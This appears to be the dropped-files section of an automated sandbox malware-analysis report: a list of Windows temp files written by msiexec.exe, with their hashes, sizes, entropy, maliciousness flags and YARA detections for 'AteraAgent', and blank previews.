                                                                                                                                                                                                                                        SSDEEP:48:sOFuFth8FXz/T5bugdfqqmTWSjndddwEqdcrGbQCSsndddwWeUJCQQq:7FBBTVtfqqmqfZcyN1ezQQq
                                                                                                                                                                                                                                        MD5:FB395C3347D7606970E528C3EEA0CC5A
                                                                                                                                                                                                                                        SHA1:0A21FC6DBEB1E603D89361D3DFE0A238929617E1
                                                                                                                                                                                                                                        SHA-256:52D9F28A27B9AC7AF225667C558F9F8EEFAC036FFF6F70503789E3192AF4B942
                                                                                                                                                                                                                                        SHA-512:2618CBACB46696146829065DF2844FAE40D919647220B64437568F2CC140E9BBF9D3A6DF11BA9F9A9807F8A5FFA1ABD4376011C13F13AF7347A2E1B24B5A4276
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.15760192660924888
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:6qoWEuSsndddPSjndddwEqdGUDjzbQZGdfqq:6qoW9f3DfwKfqq
                                                                                                                                                                                                                                        MD5:C73DE09CEC28648CDAB71647DDE7D7BC
                                                                                                                                                                                                                                        SHA1:3C0F0570723C17360D9C75964C7F0DBA60685692
                                                                                                                                                                                                                                        SHA-256:16EE4B3E50B2FC8E7544F05BE1410BFCA217F3BBE909F9BE9A82BE9ED23722F0
                                                                                                                                                                                                                                        SHA-512:78DE83997C189524B0FD1DF62208DB7FF9532A0858613F2774B2EADB43AE5DCB98A686CBD61BBE8A297A9DB3C42A78E41F4330146EE0B6A081B9F32255E24842
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF2E6CEB805A1AD5D7.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2801471122011585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:rHhwu3th8FXzFT51d/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:rBw3rT5/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:F748ABB85E9F4504D2418E6191C492E0
                                                                                                                                                                                                                                        SHA1:4FB87176D22E34B6B7C3DCD87BB354401F4900C3
                                                                                                                                                                                                                                        SHA-256:4507DF3C9832380F26C91DCBD407F5B514C896A0ADD4E1D1D6E8DBCD4EF791FC
                                                                                                                                                                                                                                        SHA-512:0FE554965514706AFA6FED05164039B0BE3E3CD3B2DEBA0A0879BC98D4C18EA048E3EAE91B3BD246DA41F8CC773A6B5A6AB7E5AB9BE01270132585CD372AA98E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF37AF000510E2973B.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2220900366703216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhcuRc06WXJEnT5HDSqISoedGPdGTbaStedGPdGTn:9hc1HnT5DnIDD
                                                                                                                                                                                                                                        MD5:DA248B97146E4F5338555E5775646CEF
                                                                                                                                                                                                                                        SHA1:F5E887A3D1F69E7306EC6A6CC10106B3904712CF
                                                                                                                                                                                                                                        SHA-256:6559352E6BE0D37D4B95CBB2B565FD8BED3F975EAE2775884D460A6815A83D28
                                                                                                                                                                                                                                        SHA-512:9F1FDFB298D4F6BBA3943113D9069155A40E7AEF3F52A21DED2075DF91CC8AE4A550D7E9A33AB5AF950A026DE4569BCB498F3F169562B83C6F82A5F4BB794966
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF41CA58E5D53CE8A0.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2313338781687264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4VUuKNveFXJbT5bDSqISoedGPdGTbaStedGPdGTn:0U8DT9DnIDD
                                                                                                                                                                                                                                        MD5:12C2752CCC149703B4DA7D0CCC7F06E0
                                                                                                                                                                                                                                        SHA1:803E4E48D9562440C78E13E20EE40343BB38809B
                                                                                                                                                                                                                                        SHA-256:0D2338B4C0EF396FFB3EB78382D5160E62E96E248707C227367456FFAC74DA3B
                                                                                                                                                                                                                                        SHA-512:63F73A830565398BC05C59EB215C68D98B4E8B7569D6534FDED9657CA4F434D235C9AA58F065E7FA0355633E2241FBEF1E637CF48DBD6FDD73B24D2595CF6F7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF454FE3DE1E4F4BC4.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2643037726326458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:ktRuuUM+xFX4XT5R6SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:k3uL0T362SIBvHoYZ
                                                                                                                                                                                                                                        MD5:BA159CD2B807B7912EC67E00BE4964D1
                                                                                                                                                                                                                                        SHA1:5E1459BB5CB5B7187AFB8A60D68DB757444368AE
                                                                                                                                                                                                                                        SHA-256:49F20A3A94727E5335D803807C612068A9637EE725DBDB00CFE7AD9F09566166
                                                                                                                                                                                                                                        SHA-512:A2296F7FA5DD28BEEE1274C286E5F21931E9A724F8194022AA75ABAD9D49F962C620584B44BE79A17996C757125DDB19A6AF8094B7B9B12CF157AC7D551C3F82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF47CBA181FC761D28.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.15846884213934206
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:oaEuSsndd4dASjndd4d/EqdGUDjzbQ2JNd/8:oa/93Dfxf/8
                                                                                                                                                                                                                                        MD5:29B2E2CEFA994CFA582C6157F89A3B17
                                                                                                                                                                                                                                        SHA1:AA884F6C198826FC12F4EA96A374F4EE9A3E1D8F
                                                                                                                                                                                                                                        SHA-256:3CEC7CD33FF4E40517822ABBEDC59B8DE5D4563819F0008C9A026E3BAA69B02D
                                                                                                                                                                                                                                        SHA-512:EC0BC1CB3725E80A832B8D55FC249C0971F73DB422BEC91C6AAD1812AC4AE316B20D87CE982FDE031592B3A008DE91819B6DCB8A9A017882195C45A697CEEFC2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF47F9F8C35B0B61B8.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2783307556899586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mOLuXth8FXzdT5bGdfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:hLXjTVKfqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:3106D03461CA36C11DA718D44F730FFC
                                                                                                                                                                                                                                        SHA1:ED5C2B0911D44FEFC0ED9A7E88EE85BECAD7777A
                                                                                                                                                                                                                                        SHA-256:575C1BD27C34C7B4C7DF98D9CC7FBDDDEC3BEDDBCCA4E40DB155B420C7D14350
                                                                                                                                                                                                                                        SHA-512:FF6475B928EA4A1560CCFFBEAB0FD1BA26CE472E7549ACDC66A55A7F0F67B60FAE54AA67A120F42616CB9FFED4DBC6348C667EB194AD0CC7E19BDF2C4E562BF2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF4E49B63DDB425763.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.07896689188905408
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOAYJFROO+G9IbSVky6l/X:2F0i8n0itFzDHF7DRONN/X
                                                                                                                                                                                                                                        MD5:FC085151AC0BD68B194323C7908CA49A
                                                                                                                                                                                                                                        SHA1:4A5C9448EFDD9AD87B9C7843D2C6519C24714B08
                                                                                                                                                                                                                                        SHA-256:05E716D0BC6AE5C79D82BB4532AB460E0C341F227B47F84FEEF5B3831C145CD6
                                                                                                                                                                                                                                        SHA-512:6044C1DF5E4161E65DB91D072B7CFA8CED9556741BBF6322CBB2DF4498CBD1B6E23CA49DD438AC7BCFF5B9C6347D664F2329E98F0BD684D303C9806BB184B38D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.077966497703753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1LtCmOuPrfkiVky6l51:2F0i8n0itFzDHFzTPrfWr
                                                                                                                                                                                                                                        MD5:785EA75A2FB1DB6D9155B28A1291DAF3
                                                                                                                                                                                                                                        SHA1:6B86F7E077D0A8823383FBB776313FEDB17BFDEA
                                                                                                                                                                                                                                        SHA-256:BCD727E77C067BD5A31C13E8024F00ED60381D9AB725CAE2E6777A5708C9DDE0
                                                                                                                                                                                                                                        SHA-512:1834BBF627951711C96708EE7AA4B6C069055E832C717561DC77592E68EFB93E65FE825A5D3D13859057C93BE96CC12701D725491C4CFC49A4EE4FD40942E72A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2313338781687264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4VUuKNveFXJbT5bDSqISoedGPdGTbaStedGPdGTn:0U8DT9DnIDD
                                                                                                                                                                                                                                        MD5:12C2752CCC149703B4DA7D0CCC7F06E0
                                                                                                                                                                                                                                        SHA1:803E4E48D9562440C78E13E20EE40343BB38809B
                                                                                                                                                                                                                                        SHA-256:0D2338B4C0EF396FFB3EB78382D5160E62E96E248707C227367456FFAC74DA3B
                                                                                                                                                                                                                                        SHA-512:63F73A830565398BC05C59EB215C68D98B4E8B7569D6534FDED9657CA4F434D235C9AA58F065E7FA0355633E2241FBEF1E637CF48DBD6FDD73B24D2595CF6F7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF53FE20EEA41BFF79.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.255395292365597
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:n69u5th8FXz/T57dYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:69RBTPn818I3DfNP
                                                                                                                                                                                                                                        MD5:4B6C30E4090CFC782D0CAD9F2CFC6C0E
                                                                                                                                                                                                                                        SHA1:F5CBAB5E2A09E50DBA6188C07818486DF06EDAE1
                                                                                                                                                                                                                                        SHA-256:DCF090068A14B7EECAF69890A43768B522686BD29112217EAB5AFF90D157D617
                                                                                                                                                                                                                                        SHA-512:A6294C4B864351B178BE2AE4CF4A1822C94EF56E97F9722E720B7069A894A2642251D38AF6D7C3BED1450691759539D198D0910FF4DE26602693E168D15E8E1B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF5D2DFBC75319C511.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2643037726326458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:ktRuuUM+xFX4XT5R6SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:k3uL0T362SIBvHoYZ
                                                                                                                                                                                                                                        MD5:BA159CD2B807B7912EC67E00BE4964D1
                                                                                                                                                                                                                                        SHA1:5E1459BB5CB5B7187AFB8A60D68DB757444368AE
                                                                                                                                                                                                                                        SHA-256:49F20A3A94727E5335D803807C612068A9637EE725DBDB00CFE7AD9F09566166
                                                                                                                                                                                                                                        SHA-512:A2296F7FA5DD28BEEE1274C286E5F21931E9A724F8194022AA75ABAD9D49F962C620584B44BE79A17996C757125DDB19A6AF8094B7B9B12CF157AC7D551C3F82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6A5C398114511295.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001188130623557
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GMMXukNveFXJbT5pBDeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:2XeDTnBD7IciuBulU4
                                                                                                                                                                                                                                        MD5:42E81CFC7B310BB55F06B690BE59224B
                                                                                                                                                                                                                                        SHA1:EE6BFEAD13AB267AF5B148D8A6FE9016E55F8C6B
                                                                                                                                                                                                                                        SHA-256:687DE0A4C6FC5714E780AAADFFAE77D0EA91007C27348191B6DE1B9897EC77DD
                                                                                                                                                                                                                                        SHA-512:F4A2FF0246C8CCCF0CDC5C2466C9923F04F0ACCC40585E1103454F4F73B736604719C1984EF443ED84671D78975BE34AA9886AC9F2C205139B8DC6F38DDCBDE4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6D3CFC025FA64744.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6016796972852392
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhTuRc06WXz+nT5odfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:9hT1jnT6fqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:6DCE79B8B3C21F74B4479E523BF949F8
                                                                                                                                                                                                                                        SHA1:863E871C321FFFF7511AE01C7DAFC36A2A0A9BE9
                                                                                                                                                                                                                                        SHA-256:03050FF94DEF001CC234B47DB7A07F246D51804C1DB8321EAB039F0E27C6B68F
                                                                                                                                                                                                                                        SHA-512:BE06C0A8839E334902A0FCCAFDCBB0CC72EFCA877F35A39E57C7AF62863232FD296E0A968A9B532587BB43C407CE8DB2239A5F1E9223AEA23968DC5A1EC70CAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6E5CDEA7C35F1C0C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.620433948434433
                                                                                                                                                                                                                                        Encrypted:false
